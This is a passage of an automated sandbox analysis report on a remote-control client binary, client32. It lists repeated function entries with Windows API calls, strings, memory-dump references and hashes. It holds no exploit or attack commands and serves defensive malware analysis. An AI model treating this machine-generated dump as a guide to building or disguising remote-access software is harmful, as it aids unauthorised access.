                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                  • String ID: string too long
                                                                                  • API String ID: 963545896-2556327735
                                                                                  • Opcode ID: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
                                                                                  • Instruction ID: 9c03118c2fef7a30d7f16138fb3dcb5344bdbe7bcaefeaa8633fdbb4ef9eb1a5
                                                                                  • Opcode Fuzzy Hash: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
                                                                                  • Instruction Fuzzy Hash: E711E9737006148FF321D95DA880BAAF7EDEF957B4F60065FE591CB640C7A1A80083A1
                                                                                  Function 110232A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110232D7
                                                                                  • SetDlgItemTextA.USER32(?,?,?), ref: 1102335F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ItemText
                                                                                  • String ID: ...
                                                                                  • API String ID: 3367045223-440645147
                                                                                  • Opcode ID: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
                                                                                  • Instruction ID: 288fafb08c6b2ba60c27d59f26b93e6fc9d809d534a4309207b318a271e26125
                                                                                  • Opcode Fuzzy Hash: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
                                                                                  • Instruction Fuzzy Hash: 1121A2756046199BCB24CF68C880FEAF7F9AF99304F1081D9E58997240DAB0AD85CF90
                                                                                  Function 110B9730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ShowWindow.USER32(8D111949,00000009,?,?,?,?,?,?,?,?,?,?,110BA876,110C032C), ref: 110B977B
                                                                                    • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004C), ref: 110B8AF2
                                                                                    • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004D), ref: 110B8AF9
                                                                                    • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004E), ref: 110B8B00
                                                                                    • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004F), ref: 110B8B07
                                                                                    • Part of subcall function 110B8AC0: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B8B16
                                                                                    • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(?), ref: 110B8B24
                                                                                    • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(00000001), ref: 110B8B33
                                                                                  • MoveWindow.USER32(8D111949,?,?,?,?,00000001), ref: 110B97A3
                                                                                  Strings
                                                                                  • j CB::OnRemoteSizeRestore(%d, %d, %d, %d), xrefs: 110B97BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: System$Metrics$Window$InfoMoveParametersShow
                                                                                  • String ID: j CB::OnRemoteSizeRestore(%d, %d, %d, %d)
                                                                                  • API String ID: 2940908497-693965840
                                                                                  • Opcode ID: 60bc414364147a50c916ce8f7c8964549782f9578ddb51fb58b5c7b9b217b13c
                                                                                  • Instruction ID: 55e82b17da46594b085dc316db9a602337c46ecd43c839d0c1f018f75bd6c70b
                                                                                  • Opcode Fuzzy Hash: 60bc414364147a50c916ce8f7c8964549782f9578ddb51fb58b5c7b9b217b13c
                                                                                  • Instruction Fuzzy Hash: DA21E875B0060AAFDB08DFA8C995DBEF7B5FB88304F104268E519A7354DB30AD41CBA4
                                                                                  Function 11043760 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 11043784
                                                                                  • GetClassNameA.USER32(?,?,00000040), ref: 11043799
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ClassNameProcessThreadWindow
                                                                                  • String ID: tooltips_class32
                                                                                  • API String ID: 2910564809-1918224756
                                                                                  • Opcode ID: 6d3c4fdc3a6f6e7596f8af0fff3375ada305fabf060d9fd927d6679c10a610bf
                                                                                  • Instruction ID: 7b66b5eeeba6873e3bd91d5637fb3b576f23a09c5117b8e426f31f0334ec312d
                                                                                  • Opcode Fuzzy Hash: 6d3c4fdc3a6f6e7596f8af0fff3375ada305fabf060d9fd927d6679c10a610bf
                                                                                  • Instruction Fuzzy Hash: DF112B71A080599BD711DF74C880AEDFBB9FF55224F6051E9DC819FA40EB71A906C790
                                                                                  Function 110391C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                    • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                    • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                    • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                    • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                    • Part of subcall function 110CB9E0: GetDlgItemTextA.USER32(?,?,?,00000400), ref: 110CBA0C
                                                                                    • Part of subcall function 110CB9E0: SetDlgItemTextA.USER32(?,?,00000000), ref: 110CBA30
                                                                                  • SetDlgItemTextA.USER32(?,000004BC,?), ref: 11039202
                                                                                  • _memset.LIBCMT ref: 11039216
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ItemText$Window$ObjectRectShow_memset
                                                                                  • String ID: 648351
                                                                                  • API String ID: 3037201586-3609006686
                                                                                  • Opcode ID: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                                  • Instruction ID: 4133adfa845279c2267cfda8ab6a139ff56e83a68c49f32f67e71b8829282469
                                                                                  • Opcode Fuzzy Hash: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                                  • Instruction Fuzzy Hash: E5119675740614AFE720DB68CC81FDAB7E8EF48704F004588F6089B280DBB1FA41CB95
                                                                                  Function 110ED5D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegQueryValueExA.ADVAPI32(00020019,?,00000000,50D94AA1,00000000,00020019,?,00000000), ref: 110ED600
                                                                                    • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: QueryValuewvsprintf
                                                                                  • String ID: ($Error %d getting %s
                                                                                  • API String ID: 141982866-3697087921
                                                                                  • Opcode ID: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
                                                                                  • Instruction ID: 957b37bb43794c395efd3ecf64b5ca03ad7d4ce898e6801f907036c689cda8f8
                                                                                  • Opcode Fuzzy Hash: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
                                                                                  • Instruction Fuzzy Hash: BC11C672E01108AFDB10DEADDD45DEEB3BCEF99614F00816EF815D7244EA71A914CBA1
                                                                                  Function 1110B550 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  • Error code %d not sent to Tutor, xrefs: 1110B5E8
                                                                                  • Error Code Sent to Tutor is %d, xrefs: 1110B575
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID: Error Code Sent to Tutor is %d$Error code %d not sent to Tutor
                                                                                  • API String ID: 2102423945-1777407139
                                                                                  • Opcode ID: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                                  • Instruction ID: b43b366142eeca4acab724c68f0e90673ee899940c55183fb17260b92f7d2313
                                                                                  • Opcode Fuzzy Hash: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                                  • Instruction Fuzzy Hash: 0911A07AA4111CABDB10DFA4CD51FEAF77CEF55308F1041DAEA085B240DA72AA14CBA5
                                                                                  Function 1100B690 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • Error. NULL capbuf, xrefs: 1100B6A1
                                                                                  • Error. preventing capbuf overflow, xrefs: 1100B6C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Error. NULL capbuf$Error. preventing capbuf overflow
                                                                                  • API String ID: 0-3856134272
                                                                                  • Opcode ID: a723116aa68a4b999a3597d1cc0fccb57ed2d6ff5a333340ea9ad9601b026ece
                                                                                  • Instruction ID: a4a4ce9073261333e851eebcc79e1773aa66005037fae8e918fe6f1657af3004
                                                                                  • Opcode Fuzzy Hash: a723116aa68a4b999a3597d1cc0fccb57ed2d6ff5a333340ea9ad9601b026ece
                                                                                  • Instruction Fuzzy Hash: C401207AA0060997D610CE54EC40ADBB398DB8036CF04483AE65E93501D271B491C6A6
                                                                                  Function 1112D6E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(00000001,WTSSendMessageA), ref: 1112D6F4
                                                                                  • SetLastError.KERNEL32(00000078,00000000,?,1113A569,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1112D735
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressErrorLastProc
                                                                                  • String ID: WTSSendMessageA
                                                                                  • API String ID: 199729137-1676301106
                                                                                  • Opcode ID: 7fb74c84802ba5a444731fdd007d56646f6016a01965a233a038b3bb232e74b6
                                                                                  • Instruction ID: 5748faf58fc4c309978bb3964bb976d1af77d24f32d17e8bed4b3b40d6b81985
                                                                                  • Opcode Fuzzy Hash: 7fb74c84802ba5a444731fdd007d56646f6016a01965a233a038b3bb232e74b6
                                                                                  • Instruction Fuzzy Hash: 7E014B72650618AFCB14DF98D880E9BB7E8EF8C721F018219F959D3640C630EC50CBA0
                                                                                  Function 110D1540 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • wvsprintfA.USER32(?,?,00000000), ref: 110D1572
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                  • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                  • API String ID: 175691280-2052047905
                                                                                  • Opcode ID: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                                  • Instruction ID: b89aa90761fb3a94205c41d70d04c41302f16292cd1454487622bd2b1eadc16a
                                                                                  • Opcode Fuzzy Hash: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                                  • Instruction Fuzzy Hash: 0EF0A975A0025DABCF00DEE4DC40BFEFBAC9B85208F40419DF945A7240DE706A45C7A5
                                                                                  Function 11015030 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageA.USER32(00000000,00001006,00000000,?), ref: 1101509D
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11015044
                                                                                  • m_hWnd, xrefs: 11015049
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
